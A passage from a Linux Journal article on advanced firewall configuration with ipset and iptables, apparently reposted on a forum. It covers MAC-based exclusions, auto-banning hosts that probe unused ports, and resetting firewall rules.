blocked_sites set except those packets coming from either of the excluded MACs, because the mark on those packets is cleared before the DROP rule is reached. This is just one way to approach the problem. Other than using a second ipset, another way would be to utilize user-defined chains. If you wanted to use a second ipset instead of the mark technique, you wouldn't be able to achieve the exact outcome as above, because ipset does not have a machash set type. There is a macipmap set type, however, but this requires matching on IP and MACs together, not on MAC alone as above. Cautionary note: in most practical cases, this solution would not actually work for Web sites, because many of the hosts that might be candidates for the blocked_sites set (like Facebook, MySpace and so on) may have multiple IP addresses, and those IPs may change frequently. A general limitation of iptables/ipset is that hostnames should be specified only if they resolve to a single IP. Also, hostname lookups happen only at the time the command is run, so if the IP address changes, the firewall rule will not be aware of the change and still will reference the old IP. For this reason, a better way to accomplish these types of Web access policies is with an HTTP proxy solution, such as Squid. That topic is obviously beyond the scope of this article. [h=3]Automatically Ban Hosts That Attempt to Access Invalid Services[/h] ipset also provides a "target extension" to iptables that provides a mechanism for dynamically adding and removing set entries based on any iptables rule. Instead of having to add entries manually with the ipset command, you can have iptables add them for you on the fly. For example, if a remote host tries to connect to port 25, but you aren't running an SMTP server, it probably is up to no good. To deny that host the opportunity to try anything else proactively, use the following rules: ipset -N banned_hosts iphash iptables -A INPUT \ -p tcp --dport 25 \ -j SET --add-set banned_hosts src iptables -A INPUT \ -m set --set banned_hosts src \ -j DROP If a packet arrives on port 25, say with source address 1.1.1.1, it instantly is added to banned_hosts, just as if this command were run: ipset -A banned_hosts 1.1.1.1 All traffic from 1.1.1.1 is blocked from that moment forward because of the DROP rule. Note that this also will ban hosts that try to run a port scan unless they somehow know to avoid port 25. [h=3]Clearing the Running Config[/h] If you want to clear the ipset and iptables config (sets, rules, entries) and reset to a fresh open firewall state (useful at the top of a firewall script), run the following commands: iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P FORWARD ACCEPT iptables -t filter -F iptables -t raw -F iptables -t nat -F iptables -t mangle -F ipset -F ipset -X Sets that are "in use", which means referenced by one or more iptables rules, cannot be destroyed (with ipset -X). So, in order to ensure a complete "reset" from any state, the iptables chains have to be flushed first (as illustrated above). [h=3]Conclusion[/h] ipset adds many useful features and capabilities to the already very powerful netfilter/iptables suite. As described in this article, ipset not only provides new firewall configuration possibilities, but it also simplifies many setups that are difficult, awkward or less efficient to construct with iptables alone. Any time you want to apply firewall rules to groups of hosts or addresses at once, you should be using ipset. As I showed in a few examples, you also can combine ipset with some of the more exotic iptables features, such as packet marking, to accomplish all sorts of designs and network policies. The next time you're working on your firewall setup, consider adding ipset to the mix. I think you will be surprised at just how useful and flexible it can be. [h=3]Resources[/h] Netfilter/iptables Project Home Page: http://www.netfilter.org ipset Home Page: http://ipset.netfilter.org ------------------------------------------------------------------------------------------ Sursa: Advanced Firewall Configurations with ipset | Linux Journal
×
×
  • Create New...